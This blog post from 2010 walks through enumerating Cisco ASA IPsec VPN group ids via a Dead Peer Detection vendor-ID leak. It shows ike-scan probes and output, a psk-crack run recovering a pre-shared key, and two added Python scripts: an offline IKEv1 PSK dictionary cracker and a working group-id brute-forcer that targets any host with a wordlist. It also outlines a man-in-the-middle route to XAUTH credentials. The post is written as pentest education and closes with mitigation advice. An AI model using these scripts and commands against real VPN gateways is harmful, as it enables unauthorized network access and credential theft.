Wednesday, December 22, 2010

How hard could it be to brute force a Cisco IPsec VPN group id?

Apparently not as hard as you would think, as a recently updated security advisory shows. The group id is used in Cisco IPsec remote access VPNs to distinguish a set of users that share common connection parameters and client attributes. Back in 2005 NTA Monitor discovered that a vulnerable Cisco IPsec implementation would answer an IKE aggressive mode negotiation if the group name carried in the IKE ID payload was valid, whereas an invalid group name resulted in no response at all.

The new variant discovered by Gavin Jones of NGS Secure depends on a difference in the vendor ID (VID) payloads of the response: the Dead Peer Detection VID is only returned for a valid group id. Dead peer detection (DPD) is a keepalive mechanism with which one IKE peer checks whether the other peer is still alive. I was wondering how difficult it would be to reproduce, given that nobody else noticed it for 5 years or cared enough to inform Cisco about it. Since the Cisco ASA is the only vulnerable product it would be the most interesting type of device to test, but as I don't have a physical device to test I used an emulated VMware version provided by the ASA project. The vulnerability is only present when the ASA is used as a remote access VPN gateway, and I used this guide with Cisco ASDM to configure it. I could only use DES instead of 3DES or AES encryption, because you need a separate license for those and the virtual ASA simply crashes when you try to add one.


Once configured we can use ike-scan to probe and test the device. I won't point you to the NTA Monitor site, as it is currently reported as a malicious website by Google, so be careful. If we use ike-scan to probe the ASA in IKE aggressive mode without a group id, using the following command, we get no response:


# ike-scan -M -A 192.168.173.50
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.437 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify



If we specify an arbitrary, non-existent group id we receive the following response:


# ike-scan -M --id=foobar -A 192.168.173.50
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.173.50    Aggressive Mode Handshake returned
    HDR=(CKY-R=0fb137a8ae462a21)
    SA=(Enc=DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    KeyExchange(128 bytes)
    Nonce(20 bytes)
    ID(Type=ID_IPV4_ADDR, Value=192.168.173.50)
    Hash(20 bytes)
    VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
    VID=09002689dfd6b712 (XAUTH)
    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
    VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)


If we guess the correct group id we will receive the following response:

# ike-scan -M --id=secret -A 192.168.173.50
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
192.168.173.50    Aggressive Mode Handshake returned
    HDR=(CKY-R=c27436032ea1c5fd)
    SA=(Enc=DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
    KeyExchange(128 bytes)
    Nonce(20 bytes)
    ID(Type=ID_IPV4_ADDR, Value=192.168.173.50)
    Hash(20 bytes)
    VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)
    VID=09002689dfd6b712 (XAUTH)
    VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
    VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
    VID=1f07f70eaa6514d3b0fa96542a500100 (Cisco VPN Concentrator)


The Dead Peer Detection VID that only appears in the response to a valid group id allows us to distinguish between valid and invalid group ids. The DPD VID value is static and does not change between requests with a valid group id, so a simple string match on the output is enough. I was quite surprised that it was this simple. Once we know a valid group id we can save the aggressive mode handshake parameters (the responder's authentication hash and the values it is computed over) with the --pskcrack option of ike-scan and then use psk-crack to perform a dictionary or brute force attack on the pre-shared key:


$ psk-crack testkey
Starting psk-crack [ike-scan 1.9] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "cisco" matches SHA1 hash a0520306d83e6c642be92f9684c10dfcc409fede
Ending psk-crack: 70752 iterations in 0.194 seconds (364486.85 iterations/sec)
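To show what psk-crack actually computes from the --pskcrack parameters, here is the offline pre-shared key recovery as an added example. It is not code from the post, from ike-scan or from psk-crack. It implements the RFC 2409 pre-shared key authentication hash; the colon-separated parameter line format it parses (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r, hex) is my reading of psk-crack's parameter file and should be checked against your ike-scan version; the "captured" handshake is constructed for a known key so the example runs offline.

```python
"""Offline recovery of the IKEv1 pre-shared key from an aggressive mode
handshake, i.e. the computation psk-crack performs on the parameters that
ike-scan --pskcrack saves.

Added example, not ike-scan's or psk-crack's own code. With pre-shared key
authentication RFC 2409 (section 5.4) defines
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
with prf = HMAC over the negotiated hash (SHA1 on the ASA above). In
aggressive mode the responder sends HASH_R unencrypted in message 2, so
every value on the right-hand side is visible on the wire and each guess
costs just two HMACs. The line format assumed here
(g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r, hex) is my reading of
psk-crack's parameter file; verify it against your ike-scan version. The
handshake below is constructed for a known key, not captured.
"""
import hashlib
import hmac
import random
from typing import Iterable, Optional

FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")
# The hash length identifies the negotiated prf: 16 bytes MD5, 20 bytes SHA1.
PRF_BY_LEN = {16: hashlib.md5, 20: hashlib.sha1}


def hash_r(psk: bytes, p: dict, hashmod=hashlib.sha1) -> bytes:
    """Responder authentication hash for a candidate PSK."""
    skeyid = hmac.new(psk, p["ni_b"] + p["nr_b"], hashmod).digest()
    msg = p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"] + p["sai_b"] + p["idir_b"]
    return hmac.new(skeyid, msg, hashmod).digest()


def parse_psk_params(line: str) -> dict:
    """Parse one hex parameter line into a dict of bytes keyed by FIELDS."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} colon-separated fields, got {len(parts)}")
    return dict(zip(FIELDS, (bytes.fromhex(x) for x in parts)))


def crack(p: dict, wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate whose HASH_R matches the captured one, else None."""
    hashmod = PRF_BY_LEN[len(p["hash_r"])]
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate, p, hashmod), p["hash_r"]):
            return candidate
    return None


def make_sample_capture(psk: bytes, hash_name: str = "sha1", seed: int = 1) -> str:
    """Constructed stand-in for an ike-scan --pskcrack file: pseudo-random
    handshake values of realistic sizes (128-byte modp1024 public values,
    8-byte cookies, 8-byte ID_IPV4_ADDR IDir) with HASH_R computed for psk."""
    hashmod = getattr(hashlib, hash_name)
    rnd = random.Random(seed)  # deterministic, so the demo is reproducible
    rb = lambda n: bytes(rnd.getrandbits(8) for _ in range(n))
    p = {"g_xr": rb(128), "g_xi": rb(128), "cky_r": rb(8), "cky_i": rb(8),
         "sai_b": rb(52), "idir_b": rb(8), "ni_b": rb(20), "nr_b": rb(20)}
    p["hash_r"] = hash_r(psk, p, hashmod)
    return ":".join(p[f].hex() for f in FIELDS)


if __name__ == "__main__":
    line = make_sample_capture(b"cisco")  # pretend this line came from --pskcrack
    params = parse_psk_params(line)
    print("recovered PSK:", crack(params, [b"password", b"admin", b"cisco"]))
```

The speed psk-crack reports above follows directly from this: one HMAC for SKEYID and one for HASH_R per guess, no salt beyond the nonces already in hand, so a weak group key falls to a dictionary in well under a second.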



Now that we have the key, does that mean that we have VPN access to the network? Unfortunately not, because the IPsec gateway commonly requests extended authentication (XAUTH) on top of the group pre-shared key. Since the group key is shared by every client, an attacker who knows it can pose as the gateway towards a connecting user (an active man in the middle) and read the XAUTH credentials that user sends, as XAUTH is only protected by the IKE SA negotiated with the attacker. A purely passive capture is not enough: the IKE SA keys also depend on the Diffie-Hellman exchange, so the pre-shared key alone does not decrypt recorded traffic. Not very likely in a pentesting scenario, but maybe you are lucky and no XAUTH is used on the device you are pentesting.


ike-scan is not the most convenient tool for brute forcing the group id, so luckily Francois Ropert recently submitted a Metasploit module to perform the brute force. Currently the module has not yet been added to trunk. According to the Cisco security response the vulnerability will be fixed in February 2011. Disabling IPsec aggressive mode is advised as a workaround; in main mode both the ID payload and the authentication hash are sent encrypted, so the offline pre-shared key attack above is ruled out as well.
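Until the Metasploit module lands, a scripted loop around ike-scan does the job. The following is an added example, not code from the post, from ike-scan or from the Metasploit module: it runs the same `ike-scan -M -A --id=<candidate>` invocation shown above for every word in a list and classifies each reply by the Dead Peer Detection VID. The sample outputs embedded in it are constructed from the format shown in this post so the classification can be exercised offline.

```python
"""Enumerate Cisco IPsec group ids through the Dead Peer Detection VID leak.

Added example: a wrapper around ike-scan, not code from the post, from
ike-scan or from the Metasploit module. For each candidate it runs
    ike-scan -M -A --id=<candidate> <target>
and classifies the reply exactly as the post does: an aggressive mode
handshake whose VID list contains the DPD vendor id means a valid group id.
The sample outputs below are constructed from the format shown in the post.
"""
import re
import subprocess
import sys
import time

# Vendor ID a Cisco peer sends for Dead Peer Detection (RFC 3706); the last
# two bytes carry the version, so we match on the fixed prefix only.
DPD_VID_PREFIX = "afcad71368a1f1c96b8696fc7757"
HANDSHAKE_MARKER = "Aggressive Mode Handshake returned"
VID_LINE = re.compile(r"^\s*VID=([0-9a-fA-F]+)")


def classify_response(output: str) -> str:
    """Classify the output of one ike-scan -M run.

    'valid'        handshake returned and the DPD VID is present
    'invalid'      handshake returned without the DPD VID (unknown group id)
    'no-response'  no handshake at all (no id given, filtered, not IKE)
    """
    if HANDSHAKE_MARKER not in output:
        return "no-response"
    vids = [m.group(1).lower() for m in map(VID_LINE.match, output.splitlines()) if m]
    return "valid" if any(v.startswith(DPD_VID_PREFIX) for v in vids) else "invalid"


def run_ike_scan(target: str, group_id: str, timeout: float = 15.0) -> str:
    """Probe target once; needs ike-scan on PATH and raw socket privileges."""
    cmd = ["ike-scan", "-M", "-A", f"--id={group_id}", target]
    return subprocess.run(cmd, capture_output=True, text=True, timeout=timeout).stdout


def enumerate_group_ids(target, candidates, runner=run_ike_scan, delay=0.5):
    """Yield (group_id, classification) per candidate, pausing between probes
    so the gateway is not flooded (each probe is a full IKE exchange for it)."""
    for gid in candidates:
        yield gid, classify_response(runner(target, gid))
        time.sleep(delay)


# --- constructed sample outputs (shape taken from the post) ---
SAMPLE_NO_RESPONSE = (
    "Starting ike-scan 1.9 with 1 hosts\n"
    "Ending ike-scan 1.9: 1 hosts scanned in 2.437 seconds (0.41 hosts/sec).  "
    "0 returned handshake; 0 returned notify\n"
)
SAMPLE_INVALID = (
    "Starting ike-scan 1.9 with 1 hosts\n"
    "192.168.173.50    Aggressive Mode Handshake returned\n"
    "    HDR=(CKY-R=0fb137a8ae462a21)\n"
    "    SA=(Enc=DES Hash=SHA1 Group=2:modp1024 Auth=PSK)\n"
    "    VID=12f5f28c457168a9702d9fe274cc0100 (Cisco Unity)\n"
    "    VID=09002689dfd6b712 (XAUTH)\n"
)
SAMPLE_VALID = SAMPLE_INVALID + "    VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)\n"


def fake_runner(valid_ids):
    """Stand-in for run_ike_scan so the loop can be exercised offline."""
    def run(target, gid):
        return SAMPLE_VALID if gid in valid_ids else SAMPLE_INVALID
    return run


if __name__ == "__main__":
    # usage: python3 groupid_enum.py <target> <wordlist>   (real probes)
    #        python3 groupid_enum.py                        (offline demo)
    if len(sys.argv) == 3:
        target, words, runner, delay = sys.argv[1], open(sys.argv[2]).read().split(), run_ike_scan, 0.5
    else:
        target, words, runner, delay = "192.168.173.50", ["foobar", "secret", "vpn"], fake_runner({"secret"}), 0
    for gid, verdict in enumerate_group_ids(target, words, runner=runner, delay=delay):
        print(f"{gid:20s} {verdict}")
```

Match on the VID hex rather than on the descriptive text in parentheses; the text is ike-scan's own label and may differ between ike-scan versions, while the vendor id bytes are what the ASA actually sends.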
